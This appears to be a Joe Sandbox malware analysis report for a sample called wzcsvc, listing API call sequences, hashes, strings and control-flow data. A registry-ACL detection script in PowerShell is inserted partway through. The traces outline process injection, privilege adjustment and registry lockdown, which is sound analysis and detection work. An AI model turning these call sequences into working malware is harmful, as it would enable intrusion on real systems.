                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000000,?,00007FF6B5AD2383,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD180A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: GetProcessHeap.KERNEL32 ref: 00007FF6B5AD1503
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: HeapAlloc.KERNEL32 ref: 00007FF6B5AD1516
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: GetProcessHeap.KERNEL32 ref: 00007FF6B5AD1524
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: HeapAlloc.KERNEL32 ref: 00007FF6B5AD1535
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: K32EnumProcesses.KERNEL32 ref: 00007FF6B5AD154F
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: OpenProcess.KERNEL32 ref: 00007FF6B5AD157D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: K32EnumProcessModules.KERNEL32 ref: 00007FF6B5AD15A2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: ReadProcessMemory.KERNELBASE ref: 00007FF6B5AD15D9
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: CloseHandle.KERNELBASE ref: 00007FF6B5AD1615
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: GetProcessHeap.KERNEL32 ref: 00007FF6B5AD1627
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: RtlFreeHeap.NTDLL ref: 00007FF6B5AD1635
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: GetProcessHeap.KERNEL32 ref: 00007FF6B5AD163B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: RtlFreeHeap.NTDLL ref: 00007FF6B5AD1649
                                                                                                                                                                                                                                                • OpenProcess.KERNEL32 ref: 00007FF6B5AD1851
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32 ref: 00007FF6B5AD1864
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00007FF6B5AD186D
                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00007FF6B5AD187D
                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
• String ID:
• API String ID: 1323846700-0
• Opcode ID: 5ed7fbe74340a9b931601102cc6c57433faa05d3f95bbe3169b19a4aead5adb9
• Instruction ID: 9a90a15b90f905a3eb50bb42d687aa22cf474aef06f2b78246fb3e4c510e0f4d
• Opcode Fuzzy Hash: 5ed7fbe74340a9b931601102cc6c57433faa05d3f95bbe3169b19a4aead5adb9
• Instruction Fuzzy Hash: 34113021F4964385EB14FB5AA4041AD6BE1AF89F84F184035EF0D937AADE3CD845C700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: Process$CloseHandleOpenWow64
• String ID:
• API String ID: 10462204-0
• Opcode ID: a364114f00c1aada9da54b572579da955c0b2e56b3f767a9c4da04bc3a71f90e
• Instruction ID: 10aabf48c2999601ed1c4b8b5add87e8a3a9f61022b5908137e2fcf5a4637f07
• Opcode Fuzzy Hash: a364114f00c1aada9da54b572579da955c0b2e56b3f767a9c4da04bc3a71f90e
• Instruction Fuzzy Hash: 05F01D21B0978292EB54AF5AA584169A6A1EF88FC0F449039EF8D93799DF3CD8858700

Control-flow Graph

APIs
  • Part of subcall function 00007FF6B5AD2264: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2287
  • Part of subcall function 00007FF6B5AD2264: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2297
  • Part of subcall function 00007FF6B5AD2264: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD22B1
  • Part of subcall function 00007FF6B5AD2264: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6B5AD22C8
  • Part of subcall function 00007FF6B5AD2264: AdjustTokenPrivileges.KERNELBASE ref: 00007FF6B5AD2300
  • Part of subcall function 00007FF6B5AD2264: GetLastError.KERNEL32 ref: 00007FF6B5AD230A
  • Part of subcall function 00007FF6B5AD2264: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2313
  • Part of subcall function 00007FF6B5AD2264: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2327
  • Part of subcall function 00007FF6B5AD2264: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD233E
  • Part of subcall function 00007FF6B5AD2264: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2357
  • Part of subcall function 00007FF6B5AD2264: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2369
  • Part of subcall function 00007FF6B5AD2264: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2376
  • Part of subcall function 00007FF6B5AD2264: RegCreateKeyExW.KERNELBASE ref: 00007FF6B5AD23B6
  • Part of subcall function 00007FF6B5AD2264: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6B5AD23DD
  • Part of subcall function 00007FF6B5AD2264: RegSetKeySecurity.KERNELBASE ref: 00007FF6B5AD23F6
  • Part of subcall function 00007FF6B5AD2264: LocalFree.KERNEL32 ref: 00007FF6B5AD2400
• ExitProcess.KERNEL32 ref: 00007FF6B5AD225B
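The call sequence recorded for the subcall at 00007FF6B5AD2264 is worth reading as one procedure: the sample opens its own process token (GetCurrentProcessId, OpenProcess, OpenProcessToken), enables a privilege on it (LookupPrivilegeValueW, AdjustTokenPrivileges), pulls a blob out of its own resources, then creates a registry key and applies a security descriptor built from an SDDL string to it (RegCreateKeyExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegSetKeySecurity). The report does not record the key path or the SDDL text, so the check below is an added example written for this page, not part of the Joe Sandbox report or of the analysed sample; the scan roots, the recursion depth and the choice of Administrators and SYSTEM as the principals that must keep ReadKey are assumptions. It enumerates keys under the assumed roots and reports DACLs with explicit Deny ACEs or without ReadKey for those principals, which is the effect such a RegSetKeySecurity call can produce, and it also reports keys whose ACL cannot be read at all.

```powershell
# Added example, not part of the Joe Sandbox report or of the analysed sample.
# Reports registry keys whose DACL looks hand-set (Deny ACEs, or no ReadKey for
# Administrators/SYSTEM), the effect a RegCreateKeyExW ->
# ConvertStringSecurityDescriptorToSecurityDescriptorW -> RegSetKeySecurity
# sequence can have. The report does not name the key, so the scan scope below
# is an assumption. Read-only: nothing is changed. Needs PowerShell 5.1 or later.
param(
    [string[]]$Roots = @('HKCU:\SOFTWARE', 'HKLM:\SOFTWARE'),  # assumed scan scope
    [int]$Depth = 3                                             # assumed recursion depth
)

$ReadKey = [System.Security.AccessControl.RegistryRights]::ReadKey

function Test-SuspiciousKeyAcl {
    param([System.Security.AccessControl.RegistrySecurity]$Acl)
    $reasons = @()
    # Explicit Deny ACEs are rare under SOFTWARE and are the simplest way to keep a
    # key unreadable for admins and scanners while the creating account keeps access.
    $deny = @($Acl.Access | Where-Object { $_.AccessControlType -eq 'Deny' })
    if ($deny.Count -gt 0) {
        $who = ($deny | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique) -join ', '
        $reasons += "Deny ACE for $who"
    }
    # Administrators and SYSTEM normally inherit FullControl (which includes ReadKey)
    # on every key under SOFTWARE; a DACL that omits them is a red flag.
    foreach ($principal in 'BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM') {
        $allow = @($Acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference.Value -eq $principal -and
            (([int]$_.RegistryRights) -band ([int]$ReadKey)) -eq ([int]$ReadKey)
        })
        if ($allow.Count -eq 0) { $reasons += "No ReadKey for $principal" }
    }
    return $reasons
}

foreach ($root in $Roots) {
    Get-ChildItem -Path $root -Recurse -Depth $Depth -ErrorAction SilentlyContinue |
    ForEach-Object {
        $key = $_
        try {
            $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop
        } catch {
            # Failing to read the ACL as the scanning user is itself a symptom:
            # a key locked down against everyone but its creator looks like this.
            [pscustomobject]@{ Key = $key.Name; Finding = "Cannot read ACL: $($_.Exception.Message)" }
            return
        }
        $findings = Test-SuspiciousKeyAcl -Acl $acl
        if ($findings.Count -gt 0) {
            [pscustomobject]@{ Key = $key.Name; Finding = ($findings -join '; ') }
        }
    }
}
```

Run it from an elevated prompt so that HKLM is fully enumerable, and treat the output as leads rather than verdicts: a handful of Windows keys legitimately carry Deny ACEs or TrustedInstaller-only write access, so compare against a clean machine of the same build before acting on a hit.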
Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
• String ID:
• API String ID: 3836936051-0
• Opcode ID: bf254cb3d6035b2809951b42138fc99801fe68d3c2285e852756cdf8c8977066
• Instruction ID: d4b2fadd4055060485bd2ae96c8f9e83044fc3cf0aba4f1224a978f1de234743
• Opcode Fuzzy Hash: bf254cb3d6035b2809951b42138fc99801fe68d3c2285e852756cdf8c8977066
• Instruction Fuzzy Hash: 4BA01100E8A28382EE0833B8082A0A800A02FA0E02F000030EA8AA22CBCC2C2802C200

Control-flow Graph
(rendered as an image in the original, legend: Executed / Not Executed. Recoverable from the graph data: basic blocks 0x23eb69f2750 to 0x23eb69f29e4; the entry block calls 0x23eb69f29e8 four times; the only API node is VirtualAlloc in block 0x23eb69f27d9.)
APIs
Memory Dump Source
• Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: d034c1b7f9d3ed927d250609444b3989583c838a356e782962ea814e96f1b213
• Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction Fuzzy Hash: 1F6136B2B0169087DF568F95D20876DF393FB44B98F5A8120CE99077C8DA3CE9A6C700

Control-flow Graph
(rendered as an image in the original, legend: Executed / Not Executed. Recoverable from the graph data: basic blocks 0x7ff6b5ad2558 to 0x7ff6b5ad2a86, with the common exit block at 0x7ff6b5ad2a6c; API nodes in the graph: ReadFile, GetProcessHeap, HeapAlloc, HeapFree, K32EnumProcesses, RegOpenKeyExW, RegDeleteValueW, ShellExecuteW, lstrlenW and ExitProcess; subcalls into 0x7ff6b5ad1000, 0x7ff6b5ad10c0, 0x7ff6b5ad14d0, 0x7ff6b5ad16c4, 0x7ff6b5ad1754, 0x7ff6b5ad17e4, 0x7ff6b5ad18a4, 0x7ff6b5ad193c, 0x7ff6b5ad19bc, 0x7ff6b5ad1c80, 0x7ff6b5ad2174, 0x7ff6b5ad21a0 and 0x7ff6b5ad2a88.)
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
• String ID: SOFTWARE$open$wzstager
• API String ID: 3276259517-3134961751
• Opcode ID: 49469aca107eb5ab870f52516a22f9f595ae3c61a78ca066b1bbf4a06be3a02f
• Instruction ID: 93f8551bf88162958c06c2d29f64e6b9fcf63c1b0ab250b3a4e0bcc51623b37c
• Opcode Fuzzy Hash: 49469aca107eb5ab870f52516a22f9f595ae3c61a78ca066b1bbf4a06be3a02f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17D15022A486839AEB75BB29A8142F92255FF44F45F400035EF5DA76DEDF3CEA05C350
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 3462610200-2766056989
                                                                                                                                                                                                                                                • Opcode ID: 5db55b7394678a523aa1a13404522c9923ae6185104554760f49e4175cea031b
                                                                                                                                                                                                                                                • Instruction ID: 6f243df4c04e2677fabe01a1d0ba50b4a3794f482ff072f1616d8b03f592359b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5db55b7394678a523aa1a13404522c9923ae6185104554760f49e4175cea031b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F517D32B04A0186EB50AF6AE8406AA7BE1FF48F98F054135DF4DA3799DF38E845C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                                                                                                                • String ID: wzsvc64
                                                                                                                                                                                                                                                • API String ID: 4184240511-201681562
                                                                                                                                                                                                                                                • Opcode ID: 8a8b947f24d0d56437289385b4e6c0331e53443c1448a47b68ed515fcd0cf7b9
                                                                                                                                                                                                                                                • Instruction ID: 5e84a2efa83f31e73d3c169ffd951760d4a2e628b33d923bcc0f0a0944a26dbd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a8b947f24d0d56437289385b4e6c0331e53443c1448a47b68ed515fcd0cf7b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC416D32B44A8296E710EF29E4442E977B1FF94F88F044176EF0D92A59DF38E545C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 9197c928365cf863f540a31c229b95b7d1b5b9020eb05a8b2cf1002d673fdf48
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFD1ACB2600B40CAEF669F25D48839DF7A2F74579CF160215EEC957B96CB38E689C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: 4befa6624efbf7b254a5279965bced147a12e1d24b670849b9ecf10f29bc47a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7981C1F170030186FE52AB65A449369E7E3BB8578CF578435AA84877D6DE3CEB4D8700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Delete$CloseEnumOpen
                                                                                                                                                                                                                                                • String ID: SOFTWARE\wzconfig
                                                                                                                                                                                                                                                • API String ID: 3013565938-1049453983
                                                                                                                                                                                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                                                                                                                                • Instruction ID: 7598b9ac51f76ca44db2155b02d0fe1fd0538bada8c41f8ff4f3bf642c5e0bed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A119422B18A8581EB60AB29E8457F92364FF44B54F404236DB4D569DDDF3CD648CB04
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzcontrol_redirect64
                                                                                                                                                                                                                                                • API String ID: 148219782-2060006620
• Opcode ID: b34fa02d577d28533ff0f18363391e30420b242850f6df86d4af65e84bfebd5f
• Instruction ID: aa49c314e4efe2cec32addac6e7efeb9102e938dfce7e7597d0e3ed21814621c
• Opcode Fuzzy Hash: b34fa02d577d28533ff0f18363391e30420b242850f6df86d4af65e84bfebd5f
• Instruction Fuzzy Hash: EF114C76A54B5182EB00AB19E4083A96760FF89FA4F444236DF1953BD9CF7CD945C740
APIs
Memory Dump Source
• Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction ID: 724e57d8392e03278ad55cc1aaf51137ac53dac1d61b8a551a9619dd5e2750f9
• Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction Fuzzy Hash: 12110AB7710A03C5FE573169D85E3699047BF5937CF2B0220A576062EADA6D4B5D4108
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction ID: b32016a61711c77bc97f6b3041893effd280fdb1dbc5385f79a9c4307122662d
• Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction Fuzzy Hash: AD51AFB2504280C6EF6A8F159448358F7A2F754B9CF1B8126DBD847BD5CB3CEAA9C701
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
• Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
• Instruction ID: 855eec9bea59a2a44505d818b18946362405b3b23c99641aa2859ba546260646
• Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
• Instruction Fuzzy Hash: F5519D623116008AEF168F15F448B6CE793F345BADF138521EA868B7C8DB7CEA49C700
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
• Instruction ID: 9d06c66aebd6894048cb1681453c73d1c89e9101b7b06a806ab4d09f5b027daa
• Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
• Instruction Fuzzy Hash: AF61BFB2504BC4C1EB668F15E44439EF7A1F785B98F068215EBD943B99DB7CE298CB00
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ntdll.dll
• API String ID: 1646373207-2227199552
• Opcode ID: 17085d13c6d19adf9107acc6e62bc0cde60057c24e7a9bdea36a2e31f8118abb
• Instruction ID: 83be4bf334405e99d56cc0b8a2a3faf445684c388f6ca6af8a0f52bd6309cded
• Opcode Fuzzy Hash: 17085d13c6d19adf9107acc6e62bc0cde60057c24e7a9bdea36a2e31f8118abb
• Instruction Fuzzy Hash: A5D0A744B9560382FE087B6A68540B003505F18F40F440071CE0E95386DE3CD8944200

Execution Graph

Execution Coverage: 0.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 74
Total number of Limit Nodes: 2

execution_graph

Nodes (id, address, labelled API calls):
15701 21681982750
15704 2168198277e
15702 2168198286c LoadLibraryA
15703 216819828e8
15705 216819b1ac4
15710 216819b1630 GetProcessHeap
15707 216819b1ad3
15708 216819b1ada Sleep SleepEx
15709 216819b15a0 StrCmpIW StrCmpW
15711 216819b1650 __free_lconv_num
15755 216819b1268 GetProcessHeap
15713 216819b1658
15714 216819b1268 2 API calls
15715 216819b1669
15716 216819b1268 2 API calls
15717 216819b1672
15718 216819b1268 2 API calls
15719 216819b167b
15720 216819b1696 RegOpenKeyExW
15721 216819b18ae
15722 216819b16c8 RegOpenKeyExW
15723 216819b16f1
15724 216819b1707 RegOpenKeyExW
15759 216819b12bc RegQueryInfoKeyW
15726 216819b1742 RegOpenKeyExW
15727 216819b172b
15730 216819b1766
15731 216819b177d RegOpenKeyExW
15770 216819b104c RegQueryInfoKeyW
15735 216819b12bc 13 API calls
15732 216819b17a1
15733 216819b17b8 RegOpenKeyExW
